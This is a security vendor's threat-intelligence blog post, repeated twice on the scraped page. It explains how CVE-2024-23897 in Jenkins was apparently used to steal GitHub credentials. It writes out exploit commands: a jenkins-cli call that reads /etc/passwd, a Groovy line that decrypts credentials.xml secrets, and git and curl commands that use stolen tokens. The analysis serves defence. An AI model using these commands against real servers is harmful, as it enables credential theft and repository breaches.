🚀 CloudSEK has raised $19M Series B1 Round – Powering the Future of Predictive Cybersecurity
Read More
This blog details how CVE-2024-23897, a Local File Inclusion (LFI) vulnerability in Jenkins, was exploited to breach Github repositories. Attackers accessed sensitive files, decrypted credentials, and used them to infiltrate private repositories. The article underscores the need for timely patching, strong authentication, and regular security audits to mitigate such threats.
Did you know that 70% of successful breaches are perpetrated by external actors exploiting vulnerabilities in an organization's attack surface? With CloudSEK BeVigil Enterprise, you can proactively detect and mitigate potential threats, ensuring a robust defense against cyber attacks.
Schedule a DemoCategory: Adversary Intelligence
Region: Global
Date: 24 July 2024
TLP: GREEN
‍
This article delves into the technical intricacies of CVE-2024-23897, an unauthenticated Local File Inclusion (LFI) vulnerability in Jenkins, and retraces how threat actors leveraged it to breach a company's Github repositories.
‍
Our story begins with a seemingly innocuous Jenkins server, a cornerstone of continuous integration and deployment pipelines. Unfortunately, this particular instance, running a vulnerable version (Jenkins 2.441 and earlier, LTS 2.426.2 and earlier), became the target of threat actors' malicious intentions recently.
To understand the attack, let's first set up a similar vulnerable environment using Docker:
‍
‍
1. Pull Docker image using the command:
docker pull jenkins/jenkins:2.440-jdk17
‍
2. Run the container:
docker run -d --name jenkins -p 8080:8080 -p 50000:50000 -v /path/to/your/local/jenkins/home:/var/jenkins_home jenkins/jenkins:2.440-jdk17
This command launches a Jenkins container, mapping ports 8080 and 50000 to the host machine and mounting a local directory to the container's /var/jenkins_home directory.
‍
3. Access the container's shell:
docker exec -it <container_name> /bin/bash
‍
With the stage set, let's explore how threat actors are exploiting the vulnerability.
‍
CVE-2024-23897 is an unauthenticated LFI vulnerability that allows attackers to read arbitrary files on the Jenkins server. This vulnerability arises from improper input validation, enabling attackers to manipulate specific parameters and trick the server into accessing and displaying the contents of sensitive files.
‍
credentials.xml
file, which stores encrypted credentials used for various integrationscredentials.xml
file, gaining access to Github SSH keys and access tokens‍
‍
Let's delve into the technical details of how IntelBroker exploited the LFI and exfiltrated the Github credentials:
‍
‍IntelBroker potentially used the Jenkins CLI tool along with the LFI vulnerability to read the contents of sensitive files. For instance, to read the /etc/passwd
file:
java -jar jenkins-cli.jar -s http://target-jenkins-server:8080/ -auth @password.txt version @/etc/passwd
‍
‍
By manipulating the @ symbol, they could trick the server into interpreting the path after it as a file to include.
Note: POC scripts for the CVE-2024-23897 are also available on github.
‍
IntelBroker potentially dumped the credentials.xml using the below POC or a script from github, to get the stored encrypted credentials. System Path for the file being /var/jenkins_home/credentials.xml
‍
credentials.xml
File:‍Jenkins stores all the Global Credentials in encrypted form in this file. The stored hash can be decrypted using hudson.util.Secret.decrypt()
.
‍
Once they had access to the credentials.xml
file, threat actors use the Jenkins Script Console and the following command to decrypt the encrypted credentials:
println(hudson.util.Secret.fromString("{XXX=}").getPlainText())
Replacing {XXX=}
with the encrypted string from the credentials.xml
file allowed them to retrieve the plaintext Github credentials.
‍
‍
‍With the stolen SSH keys and access tokens, threat actors could:
‍
Using the git clone command with the stolen SSH key added to their SSH agent or by directly embedding the access token in the URL:
git clone [email protected]:target-username/private-repo.git
‍
Note:Â
‍
Using the stolen access token in the Authorization header, they could interact with the Github API to list and download repositories:
curl -H "Authorization: token github_access_token" https://api.github.com/user/repos
‍
IntelBroker's successful breach serves as a stark reminder of the importance of cybersecurity awareness and proactive security measures. Here are some key takeaways and mitigation strategies:
‍
By understanding the intricacies of CVE-2024-23897 and implementing robust security practices, organizations can better protect themselves against such sophisticated attacks.
Over recent months, the United States has faced a surge in cyber attacks, with ransomware incidents rising sharply from June to October 2024. Prominent groups, including Play, RansomHub, Lockbit, Qilin, and Meow, have targeted sectors such as Business Services, Manufacturing, IT, and Healthcare, compromising over 800 organizations. Major attacks included a breach of the City of Columbus by Rhysida ransomware and data leaks impacting Virginia’s Department of Elections and Healthcare.gov. Additionally, China’s "Salt Typhoon" espionage campaign is aggressively targeting U.S. ISPs, further complicating the cyber threat landscape. Hacktivist groups advocating pro-Russian and pro-Palestinian positions have also increased their attacks, affecting government entities and critical infrastructure. This report highlights the need for enhanced security protocols, regular audits, and public awareness initiatives to mitigate the growing cyber risks. Key recommendations include implementing multi-factor authentication, frequent employee training, and advanced threat monitoring to safeguard the nation's critical infrastructure and public trust.
This detailed report which delves into a case study on a security incident unveiled with CloudSEK’s Digital Supply Chain Security platform SVigil on an Life Insurance Mobile Application for a prominent bank.Â
CVE 2023-20887 was discovered in the VMware Aria Operations with a CVSS score of 9.8 which leads to VMware Aria.
Take action now
CloudSEK Platform is a no-code platform that powers our products with predictive threat analytic capabilities.
Digital Risk Protection platform which gives Initial Attack Vector Protection for employees and customers.
Software and Supply chain Monitoring providing Initial Attack Vector Protection for Software Supply Chain risks.
Creates a blueprint of an organization's external attack surface including the core infrastructure and the software components.
Instant Security Score for any Android Mobile App on your phone. Search for any app to get an instant risk score.
6
min read
This blog details how CVE-2024-23897, a Local File Inclusion (LFI) vulnerability in Jenkins, was exploited to breach Github repositories. Attackers accessed sensitive files, decrypted credentials, and used them to infiltrate private repositories. The article underscores the need for timely patching, strong authentication, and regular security audits to mitigate such threats.
Category: Adversary Intelligence
Region: Global
Date: 24 July 2024
TLP: GREEN
‍
This article delves into the technical intricacies of CVE-2024-23897, an unauthenticated Local File Inclusion (LFI) vulnerability in Jenkins, and retraces how threat actors leveraged it to breach a company's Github repositories.
‍
Our story begins with a seemingly innocuous Jenkins server, a cornerstone of continuous integration and deployment pipelines. Unfortunately, this particular instance, running a vulnerable version (Jenkins 2.441 and earlier, LTS 2.426.2 and earlier), became the target of threat actors' malicious intentions recently.
To understand the attack, let's first set up a similar vulnerable environment using Docker:
‍
‍
1. Pull Docker image using the command:
docker pull jenkins/jenkins:2.440-jdk17
‍
2. Run the container:
docker run -d --name jenkins -p 8080:8080 -p 50000:50000 -v /path/to/your/local/jenkins/home:/var/jenkins_home jenkins/jenkins:2.440-jdk17
This command launches a Jenkins container, mapping ports 8080 and 50000 to the host machine and mounting a local directory to the container's /var/jenkins_home directory.
‍
3. Access the container's shell:
docker exec -it <container_name> /bin/bash
‍
With the stage set, let's explore how threat actors are exploiting the vulnerability.
‍
CVE-2024-23897 is an unauthenticated LFI vulnerability that allows attackers to read arbitrary files on the Jenkins server. This vulnerability arises from improper input validation, enabling attackers to manipulate specific parameters and trick the server into accessing and displaying the contents of sensitive files.
‍
credentials.xml
file, which stores encrypted credentials used for various integrationscredentials.xml
file, gaining access to Github SSH keys and access tokens‍
‍
Let's delve into the technical details of how IntelBroker exploited the LFI and exfiltrated the Github credentials:
‍
‍IntelBroker potentially used the Jenkins CLI tool along with the LFI vulnerability to read the contents of sensitive files. For instance, to read the /etc/passwd
file:
java -jar jenkins-cli.jar -s http://target-jenkins-server:8080/ -auth @password.txt version @/etc/passwd
‍
‍
By manipulating the @ symbol, they could trick the server into interpreting the path after it as a file to include.
Note: POC scripts for the CVE-2024-23897 are also available on github.
‍
IntelBroker potentially dumped the credentials.xml using the below POC or a script from github, to get the stored encrypted credentials. System Path for the file being /var/jenkins_home/credentials.xml
‍
credentials.xml
File:‍Jenkins stores all the Global Credentials in encrypted form in this file. The stored hash can be decrypted using hudson.util.Secret.decrypt()
.
‍
Once they had access to the credentials.xml
file, threat actors use the Jenkins Script Console and the following command to decrypt the encrypted credentials:
println(hudson.util.Secret.fromString("{XXX=}").getPlainText())
Replacing {XXX=}
with the encrypted string from the credentials.xml
file allowed them to retrieve the plaintext Github credentials.
‍
‍
‍With the stolen SSH keys and access tokens, threat actors could:
‍
Using the git clone command with the stolen SSH key added to their SSH agent or by directly embedding the access token in the URL:
git clone [email protected]:target-username/private-repo.git
‍
Note:Â
‍
Using the stolen access token in the Authorization header, they could interact with the Github API to list and download repositories:
curl -H "Authorization: token github_access_token" https://api.github.com/user/repos
‍
IntelBroker's successful breach serves as a stark reminder of the importance of cybersecurity awareness and proactive security measures. Here are some key takeaways and mitigation strategies:
‍
By understanding the intricacies of CVE-2024-23897 and implementing robust security practices, organizations can better protect themselves against such sophisticated attacks.